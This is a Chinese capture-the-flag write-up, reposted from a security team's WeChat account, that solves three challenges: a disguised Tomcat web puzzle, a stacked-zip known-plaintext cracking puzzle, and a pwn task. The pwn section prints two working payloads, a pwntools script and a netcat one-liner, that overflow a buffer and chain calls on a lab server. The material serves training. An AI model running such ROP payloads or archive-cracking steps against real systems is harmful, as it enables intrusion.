CTF学习交流群 第一期入群题writeup大放送

CTF学习交流群,由于加群人数已经超过预期,故此第一期3个入群题完成它们的“使命”,现在入群题正在更换中,现放出第一期3个入群题的简单writeup,欢迎讨论交流。

(旧题的链接暂时不撤下)

WEB:

(地址: http://www.p007.cc:8888/)

这一题也是大家最痛恨的一题,于是我先写下。

访问链接后,表面是空白的,然后查看源代码,发现

如果有经常留意国外ctf的话,会发现这段代码是Hack Dat Kiwi CTF – 2017的MD5 GAMEs 2题目,那场比赛里只有一个队伍做出来,而且是通过发现平台的漏洞而拿到flag的,而且比赛官方给的writeup也是理论性而已,所以这代码的解法暂时没有。

这题的关键也就是everything is p5eud0,这里p5eud0形似英文单词pseudo,也就是一切都是假的。

这里说一切是假的,那么大胆的想象下php代码是假的,或者服务器压根就没解析php代码,于是php代码才原样显示出来,而php后缀名只是一个幌子而已。

这题就连PHPSESSIONID、nginx都是假的

其实是tomcat+jsp,以下是Dockerfile的部分:

#pseudoRUN sed -i 's/jsp/php/' /usr/local/tomcat/conf/web.xmlRUN sed -i '$i\<error-page><error-code>404<\/error-code><location>\/404.php<\/location><\/error-page>' /usr/local/tomcat/conf/web.xmlRUN sed -i 's/port="8080"/port="80" server="nginx"/' /usr/local/tomcat/conf/server.xmlRUN sed -i 's/<Context/<Context sessionCookieName="PHPSESSIONID" /' /usr/local/tomcat/conf/context.xml

本来我是要让人猜出是jsp,但无奈很多信息都没了,就连Wappalyzer也没辨别出来

也就只有一点不太像泄露的php代码,不论GET或者POST提交都会显示那句话。

本来想的一些招数就不用了,直接弄个源码泄露,不然真的会被各位打死的。

我特意建立了一个/.git目录,而里面没有任何东西,当你访问/.git/index和/.git/config都没有的时候,就应该认为没有存在git泄露,相对而言的一个套路是告诉你去github官网找找看。(在这里澄清下,这种去github上找源码的ctf题以前可是有不少的哦。)

然后关键是找哪个账户的github呢?回想下,everything is p5eud0 (这样的名字肯定是我为了题目而建立的用户名)

访问 https://github.com/p5eud0/p5eud0

里面有一个index.jsp(←_←现在相信是jsp代码了吧)

这里/WEB-INF/是tomcat的一个特殊目录,一般而言不能从浏览器直接访问的,可以通过jsp:forwatd跳转来访问。由于是入群题,只要你找到这里,我就基本让你过了,只要提交md5=__pseudocat__就可以看到flag了。

MISC:

(地址: http://pan.baidu.com/s/1gfL987T )

附件是一个misc.zip,若是直接解压,得到一个i.png,丢入binwalk里

发现末尾有一个zip,zip里有2个文件,第一个文件名为_,第二个文件名为flag.xlsx,而且zip是加密了,在图片里也找不到什么信息,也不是伪加密也不是弱密码。回想上一期的misc吧,当时是把第2图片以NTFS流存储在最开始的rar包,那么这题有木有可能也是用同样的套路呢?

回到最早的misc.zip,使用binwalk,发现了存在2个zip,一个里面包含_,另一个则是我们刚才解压的那个。

当2个zip包叠放在一起的,一些压缩包软件(如winrar)会显示底部那个zip,而另外一些(如360压缩)会显示第一个zip。

这题是要使用zip的明文攻击,而攻击包我都直接给准备了,不需要你们再去压缩了,这次就不会被说需要什么特定的压缩软件了吧。←_←

分别从misc.zip前面和i.png后面把zip包抠出来,然后使用Advanced Archive Password Recovery(APCHPR),推荐4.53版本,

当破解出来的时候,点击“确定”,就可以另存为破解出来的压缩包。至于该文件的口令为32位,这里是破解不了的,但不影响。

打开flag.xlsx是这样的:

这个excel很大,这里可以编程把数值取出来,再绘制图。但还有一个更简单的做法,对excel进行缩放:

图中空白处就是flag

PWN:

( nc p007.cc 9999 附件地址:https://pan.baidu.com/s/1o8UO81k)

用IDA打开callme,从main进去

进去pwnme函数,发现可能可以溢出的fgets

再用pwntools的checksec查下,发现没什么保护

再用IDA打开libcallme.so

主要就是callme_one、callme_two、callme_three三个函数,分别是读取encrypted_flag.txt、key1.dat、key2.dat

所以只要溢出,更改ret,依次调用callme三个函数,注意满足函数的第一个参数为1,第二个参数为2,第三个参数为3。

以下分享下群成员天河的payload:

# -*- coding:utf8 -*-__author__='天河'from pwn 
import *context.log_level = "debug"#p=process("./callme")p=remote("p007.cc",9999)payload= 40 *'a's=ELF("./callme")addr=0x401ab0addr2=s.plt['callme_one']addr3=s.plt['callme_two']addr4=s.plt['callme_three']payload+=p64(addr)payload+=p64(1)+p64(2)+p64(3)payload+=p64(addr2)payload+=p64(addr)payload+=p64(1)+p64(2)+p64(3)payload+=p64(addr3)payload+=p64(addr)payload+=p64(1)+p64(2)+p64(3)payload+=p64(addr4)p.sendlineafter("> ",payload)p.recvall()

再分享群成员poyoten的payload:

python -c "print 'A'*40+'\xb0\x1a\x40'+'\x00'*5+'\x01'+'\x00'*7+'\x02'+'\x00'*7+'\x03'+'\x00'*7+'\x50\x18\x40'+'\x00'*5+'\xb0\x1a\x40'+'\x00'*5+'\x01'+'\x00'*7+'\x02'+'\x00'*7+'\x03'+'\x00'*7+'\x70\x18\x40'+'\x00'*5+'\xb0\x1a\x40'+'\x00'*5+'\x01'+'\x00'*7+'\x02'+'\x00'*7+'\x03'+'\x00'*7+'\x10\x18\x40'+'\x00'*5" | nc p007.cc 9999

欢迎各位讨论。

原文发布于微信公众号 - ChaMd5安全团队(chamd5sec)

原文发表时间:2017-12-18

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏九彩拼盘的叨叨叨

一起做练手项目的说明 Beta版

在最近的前端交流群里的问卷中发现,大部分参加问卷的希望有人带着项目。应大家的要求,我们小组会推出一起做项目的活动。

1103
来自专栏杨建荣的学习笔记

今天的一些感悟

我做事情还是喜欢追求速度,当然某种程度上速度和效率是成正比的,不全是。与效率相比,我更关注的是如何把一件事情做得更好,如果只是皮毛,那么这件事情的意义本...

910
来自专栏木子昭的博客

软件为什么总会有bug?

如果你的程序没有bug,只能说明你的程序不够复杂! 地球到月球的距离为39万公里; 假设一张纸的厚度为1mm,可以无限对折; 将纸对折39次就能达到547...

3478
来自专栏SAP梦心的SAP分享

【域控管理】域控的必要性

题记:本来域控这玩意儿跟我没有半毛钱关系,毕竟我是做应用类的,域控纯属系统管理范畴。 以前在TTE和LDS,公司里有使用域控,几年来以使用者的角度在观察,觉得这...

2635
来自专栏钱塘大数据

【干货】全球100款大数据工具汇总,入行必备

是第一家针对数据集成工具市场的ETL(数据的提取Extract、传输Transform、载入Load)开源软件供应商。Talend的下载量已超过200万人次,其...

1530
来自专栏大数据文摘

数据科学工具包(万余字介绍几百种工具,经典收藏版!)

27411
来自专栏钱塘大数据

大数据技术人员必备工具包,为工作提质增效

本文作者:秦陇纪 ? 本文简介:数据科学家的常用工具与基本思路,数据分析师和数据科学家使用的工具综合概述,包括开源的技术平台相关工具、挖掘分析处理工具、其它常见...

4175
来自专栏专知

【观点】漫谈推荐系统及数据库技术(二)——分布式数据库技术

【导读】推荐系统和数据库技术,一个是偏机器学习数据挖掘相关的应用,一个是偏系统存储相关的技术,这两者在实际中有很大的应用。上一次专知推出漫谈推荐系统及数据库技术...

3779
来自专栏FreeBuf

FBI被坑了!破解iPhone 5c的密码其实只要100美元

名噪一时的圣贝纳迪诺枪击案,重点似乎不在枪击案本身,而在于FBI为了能够解锁罪犯的一台iPhone 5c手机,要求苹果制作一个特别版本的iOS系统,并且要求该系...

2438
来自专栏Python中文社区

用Python爬取陈奕迅新歌《我们》10万条评论的新发现

最近就有一部“怀旧”题材的电影,未播先火,那就是刘若英的处女作——《后来的我们》。青春,爱情,梦想,一直是“怀旧”题材的核心要素,虽然电影现在还未上映,但先行发...

1643

扫码关注云+社区

领取腾讯云代金券